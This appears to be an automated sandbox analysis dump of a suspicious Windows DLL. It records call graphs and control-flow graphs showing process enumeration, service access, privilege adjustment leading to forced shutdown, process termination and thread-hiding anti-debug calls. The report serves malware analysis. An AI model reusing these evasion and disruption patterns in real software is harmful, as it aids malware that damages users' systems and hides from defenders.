6cae2a83 std::ios_base::_Ios_base_dtor 100894->100910 101042 6cc55120 OpenSCManagerA 100896->101042 100898 6cadfc00 101058 6cc55240 CreateToolhelp32Snapshot 100898->101058 100901 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100936 6cad5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100901->100936 100903 6cae37d0 Sleep 100948 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100903->100948 100904 6cc4aec0 FindFirstFileA 100904->100936 100905 6caf63b2 101066 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 100905->101066 100906 6cc55240 4 API calls 100924 6cae053a 100906->100924 100908 6cc55240 4 API calls 100929 6cae12e2 100908->100929 100909 6caf64f8 100910->100888 101046 6cc40390 100910->101046 100911 6cadffe3 100911->100906 100915 6cae0abc 100911->100915 100912 6caf6ba0 104 API calls 100912->100936 100913 6caf6e60 32 API calls 100913->100936 100915->100893 100915->100908 100916 6caf7090 77 API calls 100916->100936 100917 6cc55240 4 API calls 100917->100915 100918 6cad6722 101055 6cc51880 25 API calls 4 library calls 100918->101055 100919 6cc55240 4 API calls 100937 6cae1dd9 100919->100937 100920 6cae211c 100920->100893 100923 6cae241a 100920->100923 100921 6cc4aec0 FindFirstFileA 100921->100948 100922 6cb1e010 67 API calls 100922->100936 100925 6cc40390 11 API calls 100923->100925 100924->100915 100924->100917 100926 6cae244d 100925->100926 101064 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100926->101064 100928 6cae2452 Sleep 100928->100893 100929->100919 100929->100920 100941 6cae16ac 100929->100941 100930 6cad6162 100931 6cad740b 100932 6cc54ff0 4 API calls 100931->100932 100940 6cad775a _strlen 100932->100940 100933 6cc55240 4 API calls 100933->100920 100934 6caf6ba0 104 API calls 100934->100948 100935 6caf6e60 32 API calls 100935->100948 100936->100888 100936->100898 100936->100901 100936->100904 100936->100912 100936->100913 100936->100916 100936->100918 100936->100922 100936->100930 100937->100920 100937->100933 100938 6caf7090 77 API calls 100938->100948 100939 6cb1e010 67 API calls 100939->100948 100940->100888 100942 6cad7ba9 100940->100942 100943 6cad7b92 100940->100943 100946 6cad7b43 _Yarn 100940->100946 100945 6cc56a43 std::_Facet_Register 4 API calls 100942->100945 100944 6cc56a43 std::_Facet_Register 4 API calls 100943->100944 100944->100946 100945->100946 100947 6cc4aec0 FindFirstFileA 100946->100947 100957 6cad7be7 std::ios_base::_Ios_base_dtor 100947->100957 100948->100888 100948->100921 100948->100934 100948->100935 100948->100938 100948->100939 100949 6cc54ff0 4 API calls 100960 6cad8a07 100949->100960 100950 6cad9d7f 100954 6cc56a43 std::_Facet_Register 4 API calls 100950->100954 100951 6cad9d68 100953 6cc56a43 std::_Facet_Register 4 API calls 100951->100953 100952 6cad962c _strlen 100952->100888 100952->100950 100952->100951 100955 6cad9d18 _Yarn 100952->100955 100953->100955 100954->100955 100956 6cc4aec0 FindFirstFileA 100955->100956 100965 6cad9dbd std::ios_base::_Ios_base_dtor 100956->100965 100957->100888 100957->100949 100957->100952 100958 6cad8387 100957->100958 100959 6cc54ff0 4 API calls 100968 6cad9120 100959->100968 100960->100959 100961 6cc54ff0 4 API calls 100978 6cada215 _strlen 100961->100978 100962 6cc54ff0 4 API calls 100964 6cad9624 100962->100964 100963 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100969 6cade8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100963->100969 101056 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100964->101056 100965->100888 100965->100961 100965->100969 100967 6cc4aec0 FindFirstFileA 100967->100969 100968->100962 100969->100888 100969->100963 100969->100967 100970 6cadf7b1 100969->100970 100971 6caded02 Sleep 100969->100971 101057 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100970->101057 100990 6cade8c1 100971->100990 100973 6cade8dd GetCurrentProcess TerminateProcess 100973->100969 100974 6cada9bb 100976 6cc56a43 std::_Facet_Register 4 API calls 100974->100976 100975 6cada9a4 100977 6cc56a43 std::_Facet_Register 4 API calls 100975->100977 100985 6cada953 _Yarn _strlen 100976->100985 100977->100985 100978->100888 100978->100974 100978->100975 100978->100985 100979 6cc54ff0 4 API calls 100979->100990 100980 6cadfbb8 100981 6cadfbe8 ExitWindowsEx Sleep 100980->100981 100981->100898 100982 6cadf7c0 100982->100980 100983 6cadb009 100987 6cc56a43 std::_Facet_Register 4 API calls 100983->100987 100984 6cadaff0 100986 6cc56a43 std::_Facet_Register 4 API calls 100984->100986 100985->100905 100985->100983 100985->100984 100988 6cadafa0 _Yarn 100985->100988 100986->100988 100987->100988 100989 6cc55960 104 API calls 100988->100989 100991 6cadb059 std::ios_base::_Ios_base_dtor _strlen 100989->100991 100990->100969 100990->100973 100990->100979 100991->100888 100992 6cadb42c 100991->100992 100993 6cadb443 100991->100993 100996 6cadb3da _Yarn _strlen 100991->100996 100994 6cc56a43 std::_Facet_Register 4 API calls 100992->100994 100995 6cc56a43 std::_Facet_Register 4 API calls 100993->100995 100994->100996 100995->100996 100996->100905 100997 6cadb79e 100996->100997 100998 6cadb7b7 100996->100998 101001 6cadb751 _Yarn 100996->101001 100999 6cc56a43 std::_Facet_Register 4 API calls 100997->100999 101000 6cc56a43 std::_Facet_Register 4 API calls 100998->101000 100999->101001 101000->101001 101002 6cc55960 104 API calls 101001->101002 101003 6cadb804 std::ios_base::_Ios_base_dtor _strlen 101002->101003 101003->100888 101004 6cadbc0f 101003->101004 101005 6cadbc26 101003->101005 101008 6cadbbbd _Yarn _strlen 101003->101008 101006 6cc56a43 std::_Facet_Register 4 API calls 101004->101006 101007 6cc56a43 std::_Facet_Register 4 API calls 101005->101007 101006->101008 101007->101008 101008->100905 101009 6cadc08e 101008->101009 101010 6cadc075 101008->101010 101013 6cadc028 _Yarn 101008->101013 101012 6cc56a43 std::_Facet_Register 4 API calls 101009->101012 101011 6cc56a43 std::_Facet_Register 4 API calls 101010->101011 101011->101013 101012->101013 101014 6cc55960 104 API calls 101013->101014 101019 6cadc0db std::ios_base::_Ios_base_dtor _strlen 101014->101019 101015 6cadc7bc 101018 6cc56a43 std::_Facet_Register 4 API calls 101015->101018 101016 6cadc7a5 101017 6cc56a43 std::_Facet_Register 4 API calls 101016->101017 101026 6cadc753 _Yarn _strlen 101017->101026 101018->101026 101019->100888 101019->101015 101019->101016 101019->101026 101020 6cadd3ed 101022 6cc56a43 std::_Facet_Register 4 API calls 101020->101022 101021 6cadd406 101023 6cc56a43 std::_Facet_Register 4 API calls 101021->101023 101024 6cadd39a _Yarn 101022->101024 101023->101024 101025 6cc55960 104 API calls 101024->101025 101027 6cadd458 std::ios_base::_Ios_base_dtor _strlen 101025->101027 101026->100905 101026->101020 101026->101021 101026->101024 101032 6cadcb2f 101026->101032 101027->100888 101028 6cadd8bb 101027->101028 101029 6cadd8a4 101027->101029 101033 6cadd852 _Yarn _strlen 101027->101033 101031 6cc56a43 std::_Facet_Register 4 API calls 101028->101031 101030 6cc56a43 std::_Facet_Register 4 API calls 101029->101030 101030->101033 101031->101033 101033->100905 101034 6caddccf 101033->101034 101035 6caddcb6 101033->101035 101038 6caddc69 _Yarn 101033->101038 101037 6cc56a43 std::_Facet_Register 4 API calls 101034->101037 101036 6cc56a43 std::_Facet_Register 4 API calls 101035->101036 101036->101038 101037->101038 101039 6cc55960 104 API calls 101038->101039 101041 6caddd1c std::ios_base::_Ios_base_dtor 101039->101041 101040 6cc54ff0 4 API calls 101040->100969 101041->100888 101041->101040 101045 6cc55156 101042->101045 101043 6cc551e8 OpenServiceA 101043->101045 101044 6cc5522f 101044->100936 101045->101043 101045->101044 101052 6cc403a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101046->101052 101047 6cc43f5f CloseHandle 101047->101052 101048 6cc4310e CloseHandle 101048->101052 101049 6cae37cb 101054 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101049->101054 101050 6cc2c1e0 WriteFile WriteFile WriteFile ReadFile 101050->101052 101051 6cc4251b CloseHandle 101051->101052 101052->101047 101052->101048 101052->101049 101052->101050 101052->101051 101067 6cc2b730 101052->101067 101054->100903 101055->100931 101056->100952 101057->100982 101060 6cc552a0 std::locale::_Setgloballocale 101058->101060 101059 6cc55277 CloseHandle 101059->101060 101060->101059 101061 6cc55320 Process32NextW 101060->101061 101062 6cc553b1 101060->101062 101063 6cc55345 Process32FirstW 101060->101063 101061->101060 101062->100911 101063->101060 101064->100928 101066->100909 101068 6cc2b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101067->101068 101069 6cc2c180 101068->101069 101070 6cc2bced CreateFileA 101068->101070 101072 6cc2aa30 101068->101072 101069->101052 101070->101068 101075 6cc2aa43 __wsopen_s std::locale::_Setgloballocale 101072->101075 101073 6cc2b3e9 WriteFile 101073->101075 101074 6cc2b43d WriteFile 101074->101075 101075->101073 101075->101074 101076 6cc2b718 101075->101076 101077 6cc2ab95 ReadFile 101075->101077 101076->101068 101077->101075 101078 6cad3d62 101080 6cad3bc0 101078->101080 101079 6cad3e8a GetCurrentThread NtSetInformationThread 101081 6cad3eea 101079->101081 101080->101079
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                              • Instruction ID: 89e52c12fa2f17db4263026c0277d83fcd2190644a96e119fe476d8b95d417ce
                              • Opcode Fuzzy Hash: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                              • Instruction Fuzzy Hash: 69741771645B028FC728CF28C8D0695B7F3EF8531871E8A6DC0968BB55EB74B58ACB50
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                              • Instruction ID: 1486761de2dfdd98553987b207497d603c99493515637e483efb089ce3636106
                              • Opcode Fuzzy Hash: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                              • Instruction Fuzzy Hash: 0434F6716457018FC728CF28C8D0A95B7F3EF89318B1D8A6DC0968BB55E774B58ADB80

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7677 6cc55240-6cc55275 CreateToolhelp32Snapshot 7678 6cc552a0-6cc552a9 7677->7678 7679 6cc552e0-6cc552e5 7678->7679 7680 6cc552ab-6cc552b0 7678->7680 7683 6cc55377-6cc553a1 call 6cc62c05 7679->7683 7684 6cc552eb-6cc552f0 7679->7684 7681 6cc55315-6cc5531a 7680->7681 7682 6cc552b2-6cc552b7 7680->7682 7689 6cc553a6-6cc553ab 7681->7689 7690 6cc55320-6cc55332 Process32NextW 7681->7690 7685 6cc55334-6cc5535d call 6cc5b920 Process32FirstW 7682->7685 7686 6cc552b9-6cc552be 7682->7686 7683->7678 7687 6cc55277-6cc55292 CloseHandle 7684->7687 7688 6cc552f2-6cc552f7 7684->7688 7695 6cc55362-6cc55372 7685->7695 7686->7678 7693 6cc552c0-6cc552d1 7686->7693 7687->7678 7688->7678 7694 6cc552f9-6cc55313 7688->7694 7689->7678 7692 6cc553b1-6cc553bf 7689->7692 7690->7695 7693->7678 7694->7678 7695->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC5524E
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                              • Instruction ID: 93620b00fb95452a9160569b0bd1c67403813fb25199002ac11a949fadb81101
                              • Opcode Fuzzy Hash: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                              • Instruction Fuzzy Hash: 17314D78608300AFD7109F29CC88B0ABBF4FF95754F91492DE598C7360E3B1A8688B57

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7821 6cad3886-6cad388e 7822 6cad3894-6cad3896 7821->7822 7823 6cad3970-6cad397d 7821->7823 7822->7823 7824 6cad389c-6cad38b9 7822->7824 7825 6cad397f-6cad3989 7823->7825 7826 6cad39f1-6cad39f8 7823->7826 7829 6cad38c0-6cad38c1 7824->7829 7825->7824 7830 6cad398f-6cad3994 7825->7830 7827 6cad39fe-6cad3a03 7826->7827 7828 6cad3ab5-6cad3aba 7826->7828 7831 6cad3a09-6cad3a2f 7827->7831 7832 6cad38d2-6cad38d4 7827->7832 7828->7824 7834 6cad3ac0-6cad3ac7 7828->7834 7833 6cad395e 7829->7833 7835 6cad399a-6cad399f 7830->7835 7836 6cad3b16-6cad3b18 7830->7836 7839 6cad38f8-6cad3955 7831->7839 7840 6cad3a35-6cad3a3a 7831->7840 7841 6cad3957-6cad395c 7832->7841 7842 6cad3960-6cad3964 7833->7842 7834->7829 7843 6cad3acd-6cad3ad6 7834->7843 7837 6cad383b-6cad3855 call 6cc21470 call 6cc21480 7835->7837 7838 6cad39a5-6cad39bf 7835->7838 7836->7829 7849 6cad3860-6cad3885 7837->7849 7844 6cad3a5a-6cad3a5d 7838->7844 7839->7841 7845 6cad3b1d-6cad3b22 7840->7845 7846 6cad3a40-6cad3a57 7840->7846 7841->7833 7848 6cad396a 7842->7848 7842->7849 7843->7836 7850 6cad3ad8-6cad3aeb 7843->7850 7853 6cad3aa9-6cad3ab0 7844->7853 7851 6cad3b49-6cad3b50 7845->7851 7852 6cad3b24-6cad3b44 7845->7852 7846->7844 7855 6cad3ba1-6cad3bb6 7848->7855 7849->7821 7850->7839 7856 6cad3af1-6cad3af8 7850->7856 7851->7829 7860 6cad3b56-6cad3b5d 7851->7860 7852->7853 7853->7842 7861 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7855->7861 7863 6cad3afa-6cad3aff 7856->7863 7864 6cad3b62-6cad3b85 7856->7864 7860->7842 7872 6cad3be0-6cad3bfe 7861->7872 7863->7841 7864->7839 7866 6cad3b8b 7864->7866 7866->7855 7875 6cad3e7b 7872->7875 7876 6cad3c04-6cad3c11 7872->7876 7879 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6cad3c17-6cad3c20 7876->7877 7878 6cad3ce0-6cad3cea 7876->7878 7880 6cad3dc5 7877->7880 7881 6cad3c26-6cad3c2d 7877->7881 7882 6cad3cec-6cad3d0c 7878->7882 7883 6cad3d3a-6cad3d3c 7878->7883 7898 6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 7879->7898 7887 6cad3dc6 7880->7887 7885 6cad3dc3 7881->7885 7886 6cad3c33-6cad3c3a 7881->7886 7888 6cad3d90-6cad3d95 7882->7888 7889 6cad3d3e-6cad3d45 7883->7889 7890 6cad3d70-6cad3d8d 7883->7890 7885->7880 7892 6cad3e26-6cad3e2b 7886->7892 7893 6cad3c40-6cad3c5b 7886->7893 7894 6cad3dc8-6cad3dcc 7887->7894 7896 6cad3dba-6cad3dc1 7888->7896 7897 6cad3d97-6cad3db8 7888->7897 7895 6cad3d50-6cad3d57 7889->7895 7890->7888 7899 6cad3c7b-6cad3cd0 7892->7899 7900 6cad3e31 7892->7900 7901 6cad3e1b-6cad3e24 7893->7901 7894->7872 7902 6cad3dd2 7894->7902 7895->7887 7896->7885 7904 6cad3dd7-6cad3ddc 7896->7904 7897->7880 7915 6cad3f75-6cad3fa1 7898->7915 7899->7895 7900->7861 7901->7894 7907 6cad3e76-6cad3e79 7901->7907 7902->7907 7905 6cad3dde-6cad3e17 7904->7905 7906 6cad3e36-6cad3e3d 7904->7906 7905->7901 7911 6cad3e5c-6cad3e5f 7906->7911 7912 6cad3e3f-6cad3e5a 7906->7912 7907->7879 7911->7899 7914 6cad3e65-6cad3e69 7911->7914 7912->7901 7914->7894 7914->7907 7919 6cad4020-6cad4026 7915->7919 7920 6cad3fa3-6cad3fa8 7915->7920 7923 6cad402c-6cad403c 7919->7923 7924 6cad3f06-6cad3f35 7919->7924 7921 6cad407c-6cad4081 7920->7921 7922 6cad3fae-6cad3fcf 7920->7922 7927 6cad40aa-6cad40ae 7921->7927 7928 6cad4083-6cad408a 7921->7928 7922->7927 7925 6cad403e-6cad4058 7923->7925 7926 6cad40b3-6cad40b8 7923->7926 7929 6cad3f38-6cad3f61 7924->7929 7930 6cad405a-6cad4063 7925->7930 7926->7922 7932 6cad40be-6cad40c9 7926->7932 7933 6cad3f6b-6cad3f6f 7927->7933 7928->7929 7931 6cad4090 7928->7931 7934 6cad3f64-6cad3f67 7929->7934 7935 6cad4069-6cad406c 7930->7935 7936 6cad40f5-6cad413f 7930->7936 7931->7898 7937 6cad40a7 7931->7937 7932->7927 7938 6cad40cb-6cad40d4 7932->7938 7933->7915 7939 6cad3f69 7934->7939 7940 6cad4144-6cad414b 7935->7940 7941 6cad4072-6cad4077 7935->7941 7936->7939 7937->7927 7938->7937 7942 6cad40d6-6cad40f0 7938->7942 7939->7933 7940->7933 7941->7934 7942->7930
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                              • Instruction ID: 39e047a25c8babb2caa7b95a91098332f79d0687d1d9908a4200002c4acd1a64
                              • Opcode Fuzzy Hash: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                              • Instruction Fuzzy Hash: 3532B232246B018FC324CF28C890695B7F3EFD531476E8A6DC0EA5BA95D775B48ACB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7969 6cad3a6a-6cad3a85 7970 6cad3a87-6cad3aa7 7969->7970 7971 6cad3aa9-6cad3ab0 7970->7971 7972 6cad3960-6cad3964 7971->7972 7973 6cad396a 7972->7973 7974 6cad3860-6cad388e 7972->7974 7975 6cad3ba1-6cad3bb6 7973->7975 7983 6cad3894-6cad3896 7974->7983 7984 6cad3970-6cad397d 7974->7984 7978 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7975->7978 7993 6cad3be0-6cad3bfe 7978->7993 7983->7984 7986 6cad389c-6cad38b9 7983->7986 7988 6cad397f-6cad3989 7984->7988 7989 6cad39f1-6cad39f8 7984->7989 7992 6cad38c0-6cad38c1 7986->7992 7988->7986 7994 6cad398f-6cad3994 7988->7994 7990 6cad39fe-6cad3a03 7989->7990 7991 6cad3ab5-6cad3aba 7989->7991 7995 6cad3a09-6cad3a2f 7990->7995 7996 6cad38d2-6cad38d4 7990->7996 7991->7986 7998 6cad3ac0-6cad3ac7 7991->7998 7997 6cad395e 7992->7997 8009 6cad3e7b 7993->8009 8010 6cad3c04-6cad3c11 7993->8010 8000 6cad399a-6cad399f 7994->8000 8001 6cad3b16-6cad3b18 7994->8001 8004 6cad38f8-6cad3955 7995->8004 8005 6cad3a35-6cad3a3a 7995->8005 8006 6cad3957-6cad395c 7996->8006 7997->7972 7998->7992 8007 6cad3acd-6cad3ad6 7998->8007 8002 6cad383b-6cad3855 call 6cc21470 call 6cc21480 8000->8002 8003 6cad39a5-6cad39bf 8000->8003 8001->7992 8002->7974 8011 6cad3a5a-6cad3a5d 8003->8011 8004->8006 8012 6cad3b1d-6cad3b22 8005->8012 8013 6cad3a40-6cad3a57 8005->8013 8006->7997 8007->8001 8015 6cad3ad8-6cad3aeb 8007->8015 8020 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 8009->8020 8016 6cad3c17-6cad3c20 8010->8016 8017 6cad3ce0-6cad3cea 8010->8017 8011->7971 8018 6cad3b49-6cad3b50 8012->8018 8019 6cad3b24-6cad3b44 8012->8019 8013->8011 8015->8004 8022 6cad3af1-6cad3af8 8015->8022 8023 6cad3dc5 8016->8023 8024 6cad3c26-6cad3c2d 8016->8024 8026 6cad3cec-6cad3d0c 8017->8026 8027 6cad3d3a-6cad3d3c 8017->8027 8018->7992 8025 6cad3b56-6cad3b5d 8018->8025 8019->7970 8047 6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 8020->8047 8030 6cad3afa-6cad3aff 8022->8030 8031 6cad3b62-6cad3b85 8022->8031 8035 6cad3dc6 8023->8035 8032 6cad3dc3 8024->8032 8033 6cad3c33-6cad3c3a 8024->8033 8025->7972 8036 6cad3d90-6cad3d95 8026->8036 8037 6cad3d3e-6cad3d45 8027->8037 8038 6cad3d70-6cad3d8d 8027->8038 8030->8006 8031->8004 8034 6cad3b8b 8031->8034 8032->8023 8041 6cad3e26-6cad3e2b 8033->8041 8042 6cad3c40-6cad3c5b 8033->8042 8034->7975 8043 6cad3dc8-6cad3dcc 8035->8043 8045 6cad3dba-6cad3dc1 8036->8045 8046 6cad3d97-6cad3db8 8036->8046 8044 6cad3d50-6cad3d57 8037->8044 8038->8036 8048 6cad3c7b-6cad3cd0 8041->8048 8049 6cad3e31 8041->8049 8050 6cad3e1b-6cad3e24 8042->8050 8043->7993 8051 6cad3dd2 8043->8051 8044->8035 8045->8032 8053 6cad3dd7-6cad3ddc 8045->8053 8046->8023 8064 6cad3f75-6cad3fa1 8047->8064 8048->8044 8049->7978 8050->8043 8056 6cad3e76-6cad3e79 8050->8056 8051->8056 8054 6cad3dde-6cad3e17 8053->8054 8055 6cad3e36-6cad3e3d 8053->8055 8054->8050 8060 6cad3e5c-6cad3e5f 8055->8060 8061 6cad3e3f-6cad3e5a 8055->8061 8056->8020 8060->8048 8063 6cad3e65-6cad3e69 8060->8063 8061->8050 8063->8043 8063->8056 8068 6cad4020-6cad4026 8064->8068 8069 6cad3fa3-6cad3fa8 8064->8069 8072 6cad402c-6cad403c 8068->8072 8073 6cad3f06-6cad3f35 8068->8073 8070 6cad407c-6cad4081 8069->8070 8071 6cad3fae-6cad3fcf 8069->8071 8076 6cad40aa-6cad40ae 8070->8076 8077 6cad4083-6cad408a 8070->8077 8071->8076 8074 6cad403e-6cad4058 8072->8074 8075 6cad40b3-6cad40b8 8072->8075 8078 6cad3f38-6cad3f61 8073->8078 8079 6cad405a-6cad4063 8074->8079 8075->8071 8081 6cad40be-6cad40c9 8075->8081 8082 6cad3f6b-6cad3f6f 8076->8082 8077->8078 8080 6cad4090 8077->8080 8083 6cad3f64-6cad3f67 8078->8083 8084 6cad4069-6cad406c 8079->8084 8085 6cad40f5-6cad413f 8079->8085 8080->8047 8086 6cad40a7 8080->8086 8081->8076 8087 6cad40cb-6cad40d4 8081->8087 8082->8064 8088 6cad3f69 8083->8088 8089 6cad4144-6cad414b 8084->8089 8090 6cad4072-6cad4077 8084->8090 8085->8088 8086->8076 8087->8086 8091 6cad40d6-6cad40f0 8087->8091 8088->8082 8089->8082 8090->8083 8091->8079
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                              • Instruction ID: 904e1d14ffbac96631b3635f80b97d35d4257bb6712408b24b0ae2c8c9f65c52
                              • Opcode Fuzzy Hash: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                              • Instruction Fuzzy Hash: E251F1312067018FC320CF29C880795B7F3BF96314F6A8A1DC0EA1BA95DB75B48A8B41
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                              • Instruction ID: a0110e8cb4ce533a27e8e5ff8b8ebd0ecc10cbc404c4991d475e33995feb06d2
